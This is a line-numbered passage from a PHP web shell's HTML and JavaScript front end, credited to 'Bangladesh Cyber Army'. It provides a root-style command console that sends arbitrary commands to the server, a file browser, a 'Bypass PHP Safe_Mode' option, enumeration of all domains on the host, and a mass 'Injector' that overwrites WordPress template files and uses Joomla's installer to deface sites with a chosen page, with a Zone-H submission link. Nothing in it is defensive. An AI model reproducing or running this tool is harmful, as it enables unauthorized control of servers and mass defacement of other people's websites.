  2108.  
  2109. }
  2110.  
  2111. ;echo '</div>
  2112.  
  2113.  
  2114.  
  2115. <div id="tbl" class="tbl" style="display:none;">
  2116.  
  2117. <div class="filetable">
  2118.  
  2119. <div class="tblcnt" style="width:220px;">Name</div>
  2120.  
  2121. <div class="tblcnt" style="width:80px;">Size</div>
  2122.  
  2123. <div class="tblcnt" style="width:100px;">Modify</div>
  2124.  
  2125. <div class="tblcnt" style="width:100px;">Owner</div>
  2126.  
  2127. <div class="tblcnt" style="width:100px;">Permission</div>
  2128.  
  2129. <div class="tblcnt" style="width:80px;">Action</div>
  2130.  
  2131. </div>
  2132.  
  2133. <div id="filest"></div>
  2134.  
  2135. <div style="clear:both;"></div>
  2136.  
  2137.  
  2138.  
  2139. </div>
  2140.  
  2141.  
  2142.  
  2143. <div id="inject" class="tbl" style="display:none;">
  2144.  
  2145. <div class="filetable">
  2146.  
  2147. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
  2148.  
  2149. <div class="tblcnt" style="width:220px;">Sitename</div>
  2150.  
  2151. <div class="tblcnt" style="width:160px;">CMS</div>
  2152.  
  2153. <div class="tblcnt" style="width:120px;">Status</div>
  2154.  
  2155. </div>
  2156.  
  2157. <div id="injtbl"></div>
  2158.  
  2159. <div style="clear:both;"></div>
  2160.  
  2161.  
  2162.  
  2163. </div>
  2164.  
  2165.  
  2166.  
  2167. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
  2168.  
  2169. <script>
  2170.  
  2171.  
  2172.  
  2173. var sidebar = false;
  2174.  
  2175. var sidebar2 = false;
  2176.  
  2177. function sidebarz(){
  2178.  
  2179. $(\'#logo\').hide();
  2180.  
  2181. if(sidebar){
  2182.  
  2183. $(\'#smnu\').hide();
  2184.  
  2185. sidebar = false;
  2186.  
  2187. }else{
  2188.  
  2189. $(\'#smnu\').show();
  2190.  
  2191. sidebar = true;
  2192.  
  2193. }
  2194.  
  2195. }
  2196.  
  2197. function sidebarz2(){
  2198.  
  2199. if(sidebar2){
  2200.  
  2201. $(\'#smnu2\').hide();
  2202.  
  2203. sidebar2 = false;
  2204.  
  2205. }else{
  2206.  
  2207. $(\'#smnu2\').show();
  2208.  
  2209. sidebar2 = true;
  2210.  
  2211. }
  2212.  
  2213. }
  2214.  
  2215.  
  2216.  
  2217. function filebrs(val){
  2218.  
  2219. hideAll();
  2220.  
  2221. $(\'#status\').html(\'Status: Requesting...\');
  2222.  
  2223. $.post("", { ac: "browse", path: val},
  2224.  
  2225. function(data) {
  2226.  
  2227. $(\'#tbl\').show();
  2228.  
  2229. $(\'#status\').html(\'Status: Completed (:\');
  2230.  
  2231. $(\'#filest\').html(data);
  2232.  
  2233. });
  2234.  
  2235. }
  2236.  
  2237. function doUpdt(val){
  2238.  
  2239. var refreshId = setInterval(function() {
  2240.  
  2241. $("#injtbl").load(\'rootinject.tmp\');
  2242.  
  2243. }, 5000);
  2244.  
  2245. $.ajaxSetup({ cache: false });
  2246.  
  2247.  
  2248.  
  2249. hideAll();
  2250.  
  2251. $(\'#inject\').show();
  2252.  
  2253. $(\'#status\').html(\'Status: Requesting...\');
  2254.  
  2255. $.post("", { ac: val},
  2256.  
  2257. function(data) {
  2258.  
  2259. refreshId = "";
  2260.  
  2261. $(\'#sidebar2\').show();
  2262.  
  2263. $(\'#status\').html(\'Status: Completed (:\');
  2264.  
  2265. $(\'#injtbl\').html(data);
  2266.  
  2267. });
  2268.  
  2269.  
  2270.  
  2271. }
  2272.  
  2273.  
  2274.  
  2275. function hideAll(){
  2276.  
  2277. k1 = 0;
  2278.  
  2279. k2 = 0;
  2280.  
  2281. $(\'#sidebar2\').hide();
  2282.  
  2283. $(\'#tbl\').hide();
  2284.  
  2285. $(\'#inject\').hide();
  2286.  
  2287. $(\'#infobox\').hide();
  2288.  
  2289. $(\'#sshbox\').hide();
  2290.  
  2291. }
  2292.  
  2293.  
  2294.  
  2295. function doReq(val){
  2296.  
  2297. hideAll();
  2298.  
  2299. $(\'#inject\').show();
  2300.  
  2301. $(\'#status\').html(\'Status: Requesting...\');
  2302.  
  2303. $.post("", { ac: val},
  2304.  
  2305. function(data) {
  2306.  
  2307. $(\'#sidebar2\').show();
  2308.  
  2309. $(\'#status\').html(\'Status: Completed (:\');
  2310.  
  2311. $(\'#injtbl\').html(data);
  2312.  
  2313. });
  2314.  
  2315. }
  2316.  
  2317.  
  2318.  
  2319. function doReq2(val){
  2320.  
  2321. hideAll();
  2322.  
  2323. $(\'#status\').html(\'Status: Requesting...\');
  2324.  
  2325. $.post("", { ac: val},
  2326.  
  2327. function(data) {
  2328.  
  2329. $(\'#infobox\').show();
  2330.  
  2331. $(\'#status\').html(\'Status: Completed (:\');
  2332.  
  2333. $(\'#infotxt\').html(data);
  2334.  
  2335. });
  2336.  
  2337. }
  2338.  
  2339.  
  2340.  
  2341. //Js Multi thread post request by Elo (:
  2342.  
  2343. var k1 = 1; var k2 = 0; var req_limit = 9;
  2344.  
  2345. function doInject(){
  2346.  
  2347. var i = 0; var j = 0;
  2348.  
  2349. $(\'.conf\').each(function(){
  2350.  
  2351. i += 1;
  2352.  
  2353. var id = $(this).attr(\'title\');
  2354.  
  2355.  
  2356.  
  2357. if(id > k1){
  2358.  
  2359. j += 1; k1 += 1;
  2360.  
  2361. var link = $(this).attr(\'href\');
  2362.  
  2363.  
  2364.  
  2365. var domain = $(\'#inj_dom\' + id).html();
  2366.  
  2367. var cms = $(this).html();
  2368.  
  2369. doPost2(link,cms,id,domain);
  2370.  
  2371. }
  2372.  
  2373. if(j > req_limit){return false;}
  2374.  
  2375.  
  2376.  
  2377.  
  2378.  
  2379. });
  2380.  
  2381. }
  2382.  
  2383.  
  2384.  
  2385.  
  2386.  
  2387.  
  2388.  
  2389. function doPost2(link,cmz,id,dmn){
  2390.  
  2391. if($(\'#injchk\'+id).is(\':checked\')){
  2392.  
  2393. $(\'#inj_status\' + id).html(\'Injecting...\');
  2394.  
  2395. $.ajax({
  2396.  
  2397. url: "",
  2398.  
  2399. type: "POST",
  2400.  
  2401. timeout: 60000,
  2402.  
  2403. data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
  2404.  
  2405. dataType: "text"
  2406.  
  2407. }).done(function(msg) {
  2408.  
  2409.  
  2410.  
  2411. k2 += 1;
  2412.  
  2413.  
  2414.  
  2415. $(\'#inj_status\' + id).html(\'Parse Error\');
  2416.  
  2417. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  2418.  
  2419. var res_data = JSON.parse(msg);
  2420.  
  2421.  
  2422.  
  2423. if(res_data.status == "success"){
  2424.  
  2425. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
  2426.  
  2427. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
  2428.  
  2429. $(\'#inj_status\' + id).html(\'Success\');
  2430.  
  2431. $(\'#injst\' + id).removeClass("conf");
  2432.  
  2433.  
  2434.  
  2435. }
  2436.  
  2437. else{
  2438.  
  2439. if(res_data.status == "error"){
  2440.  
  2441. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  2442.  
  2443. $(\'#inj_status\' + id).html(res_data.msg);
  2444.  
  2445. $(\'#inj_status\' + id).addClass("injerror");
  2446.  
  2447. $(\'#injst\' + id).removeClass("conf");
  2448.  
  2449. }else{
  2450.  
  2451. $(\'#inj_status\' + id).addClass("injerror");
  2452.  
  2453. $(\'#inj_status\' + id).html(\'Unknown\');
  2454.  
  2455. $(\'#injst\' + id).removeClass("conf");
  2456.  
  2457. }
  2458.  
  2459. }
  2460.  
  2461. updateInjSts(k2);
  2462.  
  2463. if(k1 == k2){doInject();}
  2464.  
  2465. }).fail(function(jqXHR, textStatus) {
  2466.  
  2467. k2 += 1;
  2468.  
  2469. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
  2470.  
  2471. $(\'#inj_status\' + id).html(\'Timeout\');
  2472.  
  2473. updateInjSts(k2);
  2474.  
  2475. if(k1 == k2){doInject();}
  2476.  
  2477. });
  2478.  
  2479.  
  2480.  
  2481. }else{
  2482.  
  2483. k2 += 1;
  2484.  
  2485. updateInjSts(k2);
  2486.  
  2487. if(k1 == k2){doInject();}
  2488.  
  2489. }
  2490.  
  2491. }
  2492.  
  2493. //Js Multi thread post request by Elo (:
  2494.  
  2495. function updateInjSts(k){
  2496.  
  2497. var tc = $(\'#sitecount\').val();
  2498.  
  2499. if(tc > k){
  2500.  
  2501. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
  2502.  
  2503. }else{
  2504.  
  2505. $(\'#status\').html("Status: Injection Complete (:");
  2506.  
  2507. }
  2508.  
  2509. }
  2510.  
  2511.  
  2512.  
  2513. function rmvErr(){
  2514.  
  2515. $(\'.injerror\').each(function(){
  2516.  
  2517. var nano = $(this).parent();
  2518.  
  2519. $(nano).remove();
  2520.  
  2521. });
  2522.  
  2523. }
  2524.  
  2525.  
  2526.  
  2527. function rmvSlct(){
  2528.  
  2529. $(\'.conf\').each(function(){
  2530.  
  2531. var id = $(this).attr(\'title\');
  2532.  
  2533. if($(\'#injchk\'+id).is(\':checked\')){
  2534.  
  2535. $(\'#inj\' + id).remove();
  2536.  
  2537. }
  2538.  
  2539. });
  2540.  
  2541. }
  2542.  
  2543.  
  2544.  
  2545. function retryTimeout(){
  2546.  
  2547. k1 = 1; k2 = 0;
  2548.  
  2549. doInject();
  2550.  
  2551. }
  2552.  
  2553.  
  2554.  
  2555. function doSlct(){
  2556.  
  2557. $(\'.conf\').each(function(){
  2558.  
  2559. var id = $(this).attr(\'title\');
  2560.  
  2561. doToggle(id);
  2562.  
  2563. });
  2564.  
  2565. }
  2566.  
  2567.  
  2568.  
  2569. function doToggle(dd){
  2570.  
  2571. if($(\'#injchk\'+dd).is(\':checked\')){
  2572.  
  2573. $(\'#injc\'+dd).css(\'background-color\',\'red\');
  2574.  
  2575. $(\'#injchk\'+dd).attr(\'checked\',false);
  2576.  
  2577. }else{
  2578.  
  2579. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
  2580.  
  2581. $(\'#injchk\'+dd).attr(\'checked\',true);
  2582.  
  2583. }
  2584.  
  2585. }
  2586.  
  2587.  
  2588.  
  2589. function doSSH(){
  2590.  
  2591. $(\'#status\').html("Status: Requesting...");
  2592.  
  2593. var cmd = $(\'#sshcmd\').val();
  2594.  
  2595. $(\'#sshcmd\').val("");
  2596.  
  2597. $.post("", { ac: "ssh",command: cmd},
  2598.  
  2599. function(data) {
  2600.  
  2601. $(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
  2602.  
  2603. $(\'#status\').html("Status: Done.");
  2604.  
  2605. });
  2606.  
  2607. }
  2608.  
  2609. </script>
  2610.  
  2611.  
  2612.  
  2613. <div class="sshbox" id="sshbox">
  2614.  
  2615. <br />
  2616.  
  2617. <div id="sshoutput"></div>
  2618.  
  2619. [root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
  2620.  
  2621. </div>
  2622.  
  2623.  
  2624.  
  2625. <div id="sidebar" class="sidebar">
  2626.  
  2627.  
  2628.  
  2629. <div class="smnu" id="smnu" class="smnu">
  2630.  
  2631. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
  2632.  
  2633. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
  2634.  
  2635. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
  2636.  
  2637. &raquo; <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
  2638.  
  2639. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
  2640.  
  2641. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
  2642.  
  2643. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
  2644.  
  2645. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
  2646.  
  2647. &raquo; <a href="">Network Tools</a></br>
  2648.  
  2649. &raquo; <a href="">SQL Manager(Coming Soon)</a></br>
  2650.  
  2651. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
  2652.  
  2653. &raquo; <a href="?ac=killme">Kill Me</a></br>
  2654.  
  2655.  
  2656.  
  2657. </div>
  2658.  
  2659. <div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
  2660.  
  2661. </div>
  2662.  
  2663.  
  2664.  
  2665. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
  2666.  
  2667. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
  2668.  
  2669. <div id="injmain">
  2670.  
  2671. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
  2672.  
  2673. &raquo; <a href="" onClick="">Export</a></br>
  2674.  
  2675. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
  2676.  
  2677. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
  2678.  
  2679. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
  2680.  
  2681. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
  2682.  
  2683. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
  2684.  
  2685. </div>
  2686.  
  2687. <div id="inj2nd" style="display:none;">
  2688.  
  2689. <div class="rbox">
  2690.  
  2691.  
  2692.  
  2693. <div style="clear:both;"></div>
  2694.  
  2695. <center><u>WordPress</u></center><br>
  2696.  
  2697. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
  2698.  
  2699. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
  2700.  
  2701. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
  2702.  
  2703. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
  2704.  
  2705. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
  2706.  
  2707. </div>
  2708.  
  2709.  
  2710.  
  2711. <div class="rbox">
  2712.  
  2713. <center><u>Joomla</u></center><br>
  2714.  
  2715. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
  2716.  
  2717. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
  2718.  
  2719. </div>
  2720.  
  2721.  
  2722.  
  2723. <div class="rbox">
  2724.  
  2725. <center><u>Default</u></center><br>
  2726.  
  2727. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
  2728.  
  2729. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
  2730.  
  2731. </div>
  2732.  
  2733.  
  2734.  
  2735. <div style="clear:both;"></div><br />
  2736.  
  2737. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
  2738.  
  2739. </div>
  2740.  
  2741.  
  2742.  
  2743.  
  2744.  
  2745. </div>
  2746.  
  2747. <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
  2748.  
  2749. </div>
  2750.  
  2751.  
  2752.  
  2753. <div style="clear:both;"></div>
  2754.  
  2755.  
  2756.  
  2757. <div id="status">Status: Idle...</div>
  2758.  
  2759. <div class="copyright">Copyright &copy; <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
  2760.  
  2761. </body>
  2762.  
  2763. </html>';
  2764.  
  2765. ?>